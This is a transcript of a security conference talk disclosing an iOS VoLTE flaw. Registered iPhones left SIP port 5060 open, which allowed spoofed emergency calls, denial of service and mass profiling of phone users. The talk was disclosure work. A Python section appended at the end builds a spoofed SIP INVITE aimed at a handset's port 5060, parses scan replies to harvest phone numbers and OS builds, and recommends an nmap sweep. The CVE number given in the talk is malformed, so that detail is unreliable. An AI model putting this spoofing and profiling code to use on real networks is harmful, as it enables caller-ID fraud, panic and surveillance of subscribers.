
Hello everyone, good evening. Sorry for that delay, but yes, as introduced, we will be speaking about an issue that we identified in iOS devices with their implementation of Voice over LTE. Myself Hardik, and with me I have Rajnish. I prominently focus on telecom security, whereas Rajnish's focus is more on the mobile and application security side. We both work with K, who are into product development of secure communication products and other appliances.

So, the agenda of this talk: we'll go through an introduction of the telecom environment, the various components within the telecom infrastructure, also how the mobile device or the user equipment interacts with the telecom components and how the registration and onboarding happens, as well as look at the various risks around the VoLTE implementation from the operator's side as well as from the device perspective. Then we will look at the setup that we had in our lab in order to ensure that we were able to reproduce the issue that we identified on the devices, and finally come to the PoC. Then we'll look at what happened, how it happened and why it happened, which Rajnish will walk you through. Then, since this is Apple we are referring to, and I'm sure everybody is aware of the disclosure policies of Apple and how long it takes for them to resolve things, or how active they are in communicating, maybe we'll shed some more light on that front, and then we'll have the floor open for any Q&A.

Before we proceed and look at the infrastructure side of the telecom environment, there are certain abbreviations that you will see referred to again and again. RAN is the Radio Access Network; these are the cell phone towers which the device connects to. Behind it is the EPC, which is the Evolved Packet Core; this is like the back end or backhaul of the entire network where all the components sit. In this space, HSS is the Home Subscriber Server, which you can imagine as a database of all the subscriber information, including their location, what cell tower they are attached to, and what services the subscriber has access to or has subscribed to. MME is the Mobility Management Entity, which helps in authenticating the device onto the network: the moment you turn on your device, the message goes through and reaches the MME, the MME checks with the HSS whether the subscriber is part of the network or not, and then the service is established. Now two components here, SGW and PGW, which are the Serving Gateway and the Packet Gateway, focus on delivering the data services to the subscriber. The moment you turn on your 4G data or 3G data (in this talk we are narrowing ourselves only to 4G and 5G networks), the traffic is delivered using these two nodes. Also to focus on here: the Packet Gateway is also responsible for routing your traffic towards the internet or towards other external components within the network, which can be IMS. IMS is the core component here that we'll focus on, as it is solely responsible for delivering the VoLTE service to the end user, and the CSCFs are the various Call Session Control Functions which are part of the IMS network, which prominently are Proxy, Interrogating and Serving. You can consider the IMS as a PBX environment: you know how in a corporate PBX you have SIP calls going to the PBX, the PBX does all the routing and authentication, takes care of that process, and then redirects the call to the end user.

After the abbreviations, we look at the architecture: how the communication happens, how the user is onboarded on the network and what components play a role in redirecting that traffic. In this example we are looking at a 4G network as well as the 5G non-standalone network. When we talk about 5G non-standalone, the backend infrastructure still remains the same as your 4G network; the only thing that will change here is that the eNodeB will change to a gNodeB (I don't know why it is eNodeB or gNodeB, it's just there). Once the user is connected, the request goes through the MME, which then checks with the HSS. Once it is approved, the Serving Gateway comes into the picture, and then the routing happens using the Packet Gateway, which in this case is the Packet Data Network Gateway, also known as the P-Gateway. PCRF is for policy monitoring: what the data limits set for that user are, or basically it is used for the charging of the user. Then where to route that data, whether towards the internet or towards internal infrastructure, is defined in the P-Gateway. In your VoLTE-enabled device, when you look at the cellular configuration on the phone and select 4G, you also have an option to enable or disable VoLTE. The moment you enable VoLTE, all your traffic will then go through the IMS component here, and this is where we want to focus currently. So let's
look at the IMS flow here, where the EPC becomes transparent in this scenario. The moment you turn on VoLTE, the first registration packet goes to the P-CSCF, the P-CSCF does internal routing and sends it to the I-CSCF, which interrogates the HSS and identifies whether the user has that service or not, and then the Serving CSCF takes it ahead from there. When this communication happens and the user is authorized, there is an IPsec tunnel established between the user equipment and the P-CSCF, or the IMS network. The various protocols involved in this process are SIP, SDP, RTP and RTCP. SIP is a signaling protocol which everyone may be aware of, widely used across the board; SDP is the protocol which helps in negotiating the multimedia session; RTP is used to carry the media packets, so after the signaling is done the session is handed over to RTP for the call to be established; after the call is established the data is transferred on RTP, and the monitoring of RTP is done using RTCP.

When it comes to telecom security, a lot of telecom operators forget to perform any kind of assessment on the VoLTE side or on the SIP side, because mostly the protocols that these guys focus on are SS7, Diameter and GTP. Now I think there are a lot of measures in securing these protocols and they're heavily monitored, whereas VoLTE is still not so much monitored, and it can be easily accessed just using a SIM card. You don't need to have any special access or any special network to reach the core infrastructure of the operator; you just need a SIM card and a VoLTE-enabled device to do that.

We'll look at the registration: what happens on the device the moment we turn on VoLTE. Everything here is still on the signaling side; we have not reached the data side so far. The registration packet is sent to the P-CSCF. The P-CSCF receives the request and forwards it to the I-CSCF to verify whether that particular user has access to the service, yes or no, and whether the challenge received is acceptable or not. Once the I-CSCF receives it, it checks with the HSS, and the first request always comes back as a 401 Unauthorized through the S-CSCF. That message goes with a nonce, which is then computed by the device using the keys existing in the SIM card and sent across again through the same process, and for the next request we have a 200 OK saying that the user is authorized and can utilize VoLTE. That's when the IPsec tunnel is also established.

Now, what are the issues that can come across in such a network? First, it is easily accessible: SIM cards are widely available that you can use. At the same time, once you start enumeration, you will see exposure of a lot of internal infrastructure being reachable from the user itself; this infrastructure includes the IMS infrastructure as well as all the aggregation points which are available on the network. Next, what you could do is send REGISTER and INVITE packets to the IMS itself, impersonating yourself as any XYZ party, and then start flooding the IMS infrastructure with those packets and see if something clicks. For example, if I keep trying to register myself as Rajnish, and one of the parameters clicks, I'm trying to impersonate him on the device or on any of my SIP clients. Third would be to just flood the infrastructure with random SIP packets, which could be REGISTER, INVITE or anything, and then the network will try to process them: the P-CSCF will try to process that request and route it across, which will create delays in the network for all the other authorized users who are trying to utilize that service. Then we could also target other VoLTE users who are connected on the network, irrespective of whether they are on the same tower, the same region or different regions. You could target all the users irrespective of where they're located, and this is what we have focused on in this scenario. And last, you could directly do baseband fuzzing using these techniques, where you directly interact
with the device's baseband and see what triggers a crash or error or anything on that front. But the focus here is targeting other VoLTE users. To do that, our setup included the implementation of Open5GS, which is now pretty mature, with Kamailio for IMS purposes. To simulate 5G and 4G networks we used a USRP B210 and a bladeRF x40 for the LTE part. We had customizable SIM cards which support the IMS profile, and then of course we had target iPhones which had a version below 15. All iOS devices which had version 15 or lower were all impacted, since the inception of the implementation of VoLTE on them. Then we had an Android device. Why Android? Because we get the flexibility of playing around with the APN: on your device you have multiple APNs configured, maybe for internet, IMS and MMS. The one we are focusing on is the IMS APN, which redirects the traffic to the IMS network, and then setting routing rules on the device to ensure that we are able to intercept the traffic that is going out and play around with it.

A quick demo of what happens here on the device. On the right we have our test laptop connected to the Android device, which is then routing the traffic to the IMS core and then reaching back to the iOS device, and on the left you have the logs which are generated from the iPhone. In this scenario what we are doing is trying to send a spoofed call to an iOS device using the telecom infrastructure as the transit, so everything that we do here with the device goes through the telecom infrastructure, but without any logs being saved on the telco side: we are directly triggering the request on the iOS device, and you could make spoofed calls on the device. Maybe more details can be shared by Rajnish here. The initial detail that you see here is the interface on the iOS device which is used for making and receiving VoLTE calls, as well as the server details and the device details of the iOS device, where in this case the device is using version 13.3.1. This helps an offensive actor get a profile of the user: what kind of device that user is using, what IP address they are on, what their mobile number is, what their potential location is. All that can be achieved using this method, and this helps in profiling your target. When you try to simulate the attack in a production environment, you can enumerate all the VoLTE devices connected on the operator with their iOS versions and then go further. You practically can profile anyone and everyone in this country connected on VoLTE, and then, I don't know, it could raise a lot of alarm and a lot of things can be done based on that information. And now I will hand it over to Rajnish.
So thank you Hardik for explaining the entire telecom back end of VoLTE, and now we'll try to understand what exactly was happening on the device, because that is what we are interested in. Before we start on that point, let's look at the impact the vulnerability that we identified could have. Just imagine everyone sitting in this room having an iOS device, and suddenly everyone's phone starts ringing at random with, say, a call from the police or any emergency service for that matter. The PoC that we showed was 100, which is the number for the police, and we can make spoofed calls by exploiting the vulnerability, so that is one of the impacts. Then what you can also do is identify the PII of the user, which helps in profiling, as Hardik mentioned, and also helps you get more details about your victim: their exact iOS version, their phone numbers, their location and whatnot. Also, as Hardik mentioned earlier, you can initiate multiple requests inside the telecom infrastructure that would allow us to basically DoS the end user equipment and make their telephony component inaccessible to anybody who is trying to reach them. I can just flood the telephony component on your device, and if somebody is trying to reach you they won't be able to, so that can create a state of panic if done on a large scale. Further, you can try fuzzing the SIP component and find more vulnerabilities in this, but here we'll focus on what we identified, how we identified it and what it led to.

This started as part of a bigger engagement, but we ended up finding this vulnerability; this was an unexpected one. When we started investigating this vulnerability, we looked at the VoLTE component of the device. On iOS devices there is this library called CommCenter, which is responsible for handling anything and everything related to communications, say calls, and also Wi-Fi and Bluetooth. The specific component that is part of CommCenter, known as libIPTelephony, was responsible for initiating the VoLTE registration phase. So what happens when you turn your device on or you just switch it off from airplane mode? The device undergoes a SIP registration flow, as Hardik mentioned in one of the earlier slides. The device initiates the registration flow by sending off a REGISTER packet to the P-CSCF. The P-CSCF is basically a proxy that forwards the request to the I-CSCF, and the I-CSCF basically confirms the identity of the subscriber, checks it with the home server, and if the identity exists, allows it to access whatever component it has access to.

We did the same on an iOS device. We hooked the iOS device to a debugger, we were observing the logs and we switched off airplane mode. When airplane mode is switched off, there is this interface on iOS devices called pdp_ip1 that is triggered, and basically pdp_ip1 is the interface that is in question here, and that is the one that is vulnerable in this case. IPv4 assignments are carried out and the phone sends a REGISTER packet to the IMS core. When a phone is switched on and brought online, there is this REGISTER packet that is sent to the IMS core utilizing port 5060. I'm sure everybody who is looking at bug bounties, or anybody who has run nmap at any point in their career, would have come across this port, because this is a very famous port and it is utilized for all SIP-based services. Port number 5060 is utilized and a SIP REGISTER packet is sent to the IMS core. As we saw in the initial diagram, the REGISTER packet fails because it is an unauthenticated REGISTER packet. There is a shared secret that is stored inside your SIM card, and that shared secret is used to authenticate with the home server so that you can verify the legitimacy of the user who's trying to access the network. The first initial REGISTER packet fails, but the next REGISTER packet is sent back with the nonce, the nonce is verified by the home server, and then the IPsec tunnel is established.

Regarding the IPsec tunnel, there is a 3GPP guideline that says that if a device is registered on a VoLTE network and an IPsec tunnel is established, all the communication exiting the device has to be done using the IPsec tunnel. So basically the IPsec tunnel creates an end-to-end tunnel from the device, that is your iPhone, to any internal infrastructure, and there cannot be any more listening done. What we identified here is that iOS devices do not comply with the 3GPP norms. The 3GPP norms, as I mentioned, say that you
have to terminate the port or the service that is listening, and once the IPsec tunnel is established, just close all the ports. Looking at the port scan, the CommCenter library that we are looking at is still listening for incoming SIP packets. This is the interesting part: your phone is already registered on the telecom network, the phone is able to make calls and receive calls, but it is still listening for incoming SIP packets. So what we as an attacker were able to do is try to enumerate the device and send a malformed packet to that listening service. This was what we did, but we thought, you know, this cannot go wrong, because Apple is a very big company and this is a very basic implementation. So we tried to verify the same on various other manufacturers that use Android, for that matter: we tested Samsung and Nexus phones, and in those cases, once the IPsec tunnel was established, the library responsible for initiating the SIP communication terminated the port and all the communication took place through the IPsec tunnel. So we confirmed our vulnerability: okay, there is something wrong, what can we do with it?

What we did was use a very old friend. I'm sure everyone knows what this terminal is; it looks like an nmap terminal, this is how we start hacking. We ran a mass network scan looking for port 5060, and to our surprise we were able to enumerate more than a million devices on the telecom network with the exact iOS version and build number that they were using, with their phone numbers, with their IPs and with their locations. This was interesting, and then, as I mentioned earlier, we tried sending a malformed packet to those identified iOS devices. One of those devices was our device and we knew its IP, so we crafted a malicious packet. As you can see, the user agent is some random user agent, and the call that is initiated is also a spoofed call, so it will show as phone number 1, or police, or emergency services. When we sent it, the phone, as expected, responded to that incoming SIP packet and initiated a call, so on the victim's device you could see a call coming from 1, or any emergency service for that matter. We have the Wireshark dumps to show that this process was happening and the phone was ringing. You could see in the third block that the phone has initiated a call, and it cannot accept any other call until this call is terminated. As mentioned earlier, the iOS device was still listening on port 5060, which we have highlighted at the top for both TCP and UDP connections, and the highlighting below basically shows that it's also connected to the IPsec tunnel. This was violating the 3GPP guidelines, and we went ahead and reported it to Apple.

I'm sure by now you have understood the root cause, why it was happening and what the issue was here. As an attacker, having my test laptop connected to the wireless network, I was able to make calls to anybody and everybody who is part of my telecom network, and this is what we show here: the attacker's machine, using the telecom network, is able to make spoofed calls or even get details from a random victim's user equipment, that is the phone. As security personnel or security enthusiasts, if we know what the root cause is, I'm sure it is very easy to fix. We knew that the root cause is that you just have to close port 5060 once the IPsec tunnel establishment is done, and initiate another session once the phone is brought back online after turning off airplane mode. This is the simple fix that was issued by Apple in iOS 15.2, where libIPTelephony, the library responsible for handling the calls, terminates the IMS TCP socket once the TLS connection within the IPsec tunnel is established, and this can be seen from the CommCenter logs. This has been properly implemented, so the issue is fixed now.

We'll talk a bit about the timeline. This was reported to Apple in March 2021. As you know, Apple is very notorious to work with for researchers sometimes, so it was very difficult; we had a long, long conversation history. They released a fix, and we were able to bypass the fix, because they were only monitoring one of the interfaces, and we could just route the packets through a different interface and issue the calls again. The patch was finally released which handles all the interfaces that interact with the VoLTE component; the fix was issued by the end of November 2021, and it came out in public in 2022, and we were awarded a CVE, that is CVE-2021-311. This was pretty much what we identified, and this was our interesting encounter with Apple and its VoLTE component. I would like to end by saying that, you know, great things are done by a series of small things brought together, so sometimes even the smallest things can cause a massive impact, and we just have to keep looking at it. Thank you.
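The two SIP exchanges the talk walks through, the authenticated REGISTER (401 with a nonce, then a 200 OK) and the unauthenticated INVITE sent straight to a registered phone's port 5060, as an added example that is not part of the talk and not the speakers' PoC, Apple's code, or Open5GS/Kamailio code. It assumes plain SIP Digest (RFC 2617) in place of IMS AKA, an invented realm `ims.example.net`, invented IP addresses and numbers, and a constructed UE reply (`SAMPLE_UE_REPLY`) standing in for what the port-5060 sweep returned; `register_flow`, `build_spoofed_invite` and `profile_ue` are the editor's illustration of the protocol, nothing is put on the wire.

```python
"""SIP builder/parser for the VoLTE REGISTER challenge and the post-registration
INVITE discussed in the talk. All messages are constructed locally; nothing is sent."""
import hashlib
import re
import uuid

CRLF = "\r\n"
COMPACT = {"v": "via", "f": "from", "t": "to", "i": "call-id", "m": "contact",
           "l": "content-length", "c": "content-type"}  # RFC 3261 compact header names
md5 = lambda s: hashlib.md5(s.encode()).hexdigest()
# Constructed sample of the kind of reply a scanned UE gives (all values invented)
SAMPLE_UE_REPLY = (b"SIP/2.0 200 OK\r\nVia: SIP/2.0/UDP 10.0.0.5:5060;branch=z9hG4bKabc\r\n"
                   b"f: <sip:scan@10.0.0.9>;tag=1\r\nt: <sip:10.0.0.5>\r\ni: 1@10.0.0.9\r\n"
                   b"CSeq: 1 OPTIONS\r\nP-Asserted-Identity: <sip:+15550001234@ims.example.net>\r\n"
                   b"User-Agent: iOS-UE/13.3.1\r\n (example build)\r\nContent-Length: 0\r\n\r\n")

def build_request(method, request_uri, from_hdr, to_hdr, local_ip, extra=(), body=""):
    """Minimal RFC 3261 request; a real UE adds many more headers than this."""
    headers = [f"Via: SIP/2.0/UDP {local_ip}:5060;branch=z9hG4bK{uuid.uuid4().hex[:16]}",
               f"From: {from_hdr};tag={uuid.uuid4().hex[:8]}", f"To: {to_hdr}",
               f"Call-ID: {uuid.uuid4()}@{local_ip}", f"CSeq: 1 {method}",
               f"Contact: <sip:{local_ip}:5060>", *extra]
    if body:
        headers.append("Content-Type: application/sdp")
    headers.append(f"Content-Length: {len(body.encode())}")
    return f"{method} {request_uri} SIP/2.0{CRLF}{CRLF.join(headers)}{CRLF}{CRLF}{body}".encode()

def build_response(code, reason, request, extra=()):
    """Response to `request`, echoing the headers that identify the transaction."""
    h = parse_sip(request)["headers"]
    headers = [f"Via: {h['via']}", f"From: {h['from']}", f"To: {h['to']}",
               f"Call-ID: {h['call-id']}", f"CSeq: {h['cseq']}", *extra, "Content-Length: 0"]
    return f"SIP/2.0 {code} {reason}{CRLF}{CRLF.join(headers)}{CRLF}{CRLF}".encode()

def parse_sip(raw):
    """Start line, headers (lowercased, compact names expanded, folded lines joined,
    first occurrence kept), body, and the status code when `raw` is a response."""
    head, _, body = raw.decode("utf-8", "replace").partition(CRLF + CRLF)
    lines, headers, last = head.split(CRLF), {}, None
    for line in lines[1:]:
        if line[:1] in " \t":                      # folded continuation of the previous header
            if last:
                headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = COMPACT.get(name.strip().lower(), name.strip().lower())
        headers.setdefault(last, value.strip())
    first = lines[0].split(" ", 2)
    status = int(first[1]) if first[0].startswith("SIP/") and len(first) > 1 else None
    return {"start_line": lines[0], "headers": headers, "body": body, "status": status}

def digest_response(user, realm, secret, method, uri, nonce):
    """RFC 2617 MD5 digest (no qop). Plain Digest is assumed here for readability;
    IMS AKAv1-MD5 has the same shape with `secret` being the RES the SIM derives
    from the challenge (the 'keys existing in the SIM card' in the talk)."""
    ha1, ha2 = md5(f"{user}:{realm}:{secret}"), md5(f"{method}:{uri}")
    return md5(f"{ha1}:{nonce}:{ha2}")

def register_flow(impu, impi, secret, local_ip, hss, realm="ims.example.net"):
    """Both sides of REGISTER -> 401 -> REGISTER+Authorization -> 200/403. A toy core
    (`hss` maps IMPI to shared secret) stands in for P/I/S-CSCF and HSS.
    Returns the status codes the UE sees, e.g. [401, 200]."""
    uri, ident = f"sip:{realm}", f"<{impu}>"
    req = build_request("REGISTER", uri, ident, ident, local_ip)
    nonce = uuid.uuid4().hex                                   # core: fresh challenge
    chal = build_response(401, "Unauthorized", req,
                          [f'WWW-Authenticate: Digest realm="{realm}", nonce="{nonce}"'])
    # UE: read the nonce back out of the 401 and answer it with its own secret
    n = re.search(r'nonce="([^"]+)"', parse_sip(chal)["headers"]["www-authenticate"]).group(1)
    ans = digest_response(impi, realm, secret, "REGISTER", uri, n)
    req2 = build_request("REGISTER", uri, ident, ident, local_ip,
                         [f'Authorization: Digest username="{impi}", realm="{realm}", '
                          f'nonce="{n}", uri="{uri}", response="{ans}"'])
    # core: recompute with the HSS copy of the secret and compare
    got = re.search(r'response="([^"]+)"', parse_sip(req2)["headers"]["authorization"]).group(1)
    ok = got == digest_response(impi, realm, hss.get(impi, ""), "REGISTER", uri, nonce)
    final = build_response(200, "OK", req2) if ok else build_response(403, "Forbidden", req2)
    return [parse_sip(chal)["status"], parse_sip(final)["status"]]

def build_spoofed_invite(target_ip, target_number, caller_number, caller_display, local_ip):
    """The packet class the talk describes: an INVITE aimed straight at a UE's port 5060
    after registration, so no IMS element vouches for the From/P-Asserted-Identity."""
    frm = f'"{caller_display}" <sip:{caller_number}@ims.example.net>'
    sdp = (f"v=0{CRLF}o=- 1 1 IN IP4 {local_ip}{CRLF}s=-{CRLF}c=IN IP4 {local_ip}{CRLF}"
           f"t=0 0{CRLF}m=audio 4000 RTP/AVP 8{CRLF}a=rtpmap:8 PCMA/8000{CRLF}")
    return build_request("INVITE", f"sip:{target_number}@{target_ip}:5060", frm,
                         f"<sip:{target_number}@ims.example.net>", local_ip,
                         [f"P-Asserted-Identity: {frm}", "User-Agent: example-sipcli/0.1"], sdp)

def profile_ue(raw):
    """What the port-5060 sweep in the talk harvested per UE: its User-Agent (OS/build)
    and the number it asserts (P-Asserted-Identity, else From)."""
    h = parse_sip(raw)["headers"]
    ident = h.get("p-asserted-identity") or h.get("from", "")
    num = re.search(r"sips?:([^@;>]+)", ident)
    return {"user_agent": h.get("user-agent") or h.get("server"),
            "number": num.group(1) if num else None}
```

The contrast worth noticing is between the two builders: `register_flow` cannot complete without the SIM-side secret, whereas `build_spoofed_invite` needs nothing but the target's address, because the phone that keeps port 5060 open after registration never asks anyone to prove the `From` header. On a patched device the INVITE simply has no listener to reach; a quick `nmap -sU -sT -p 5060` against the IMS-side address of a registered handset, as the speakers did, is the practical check.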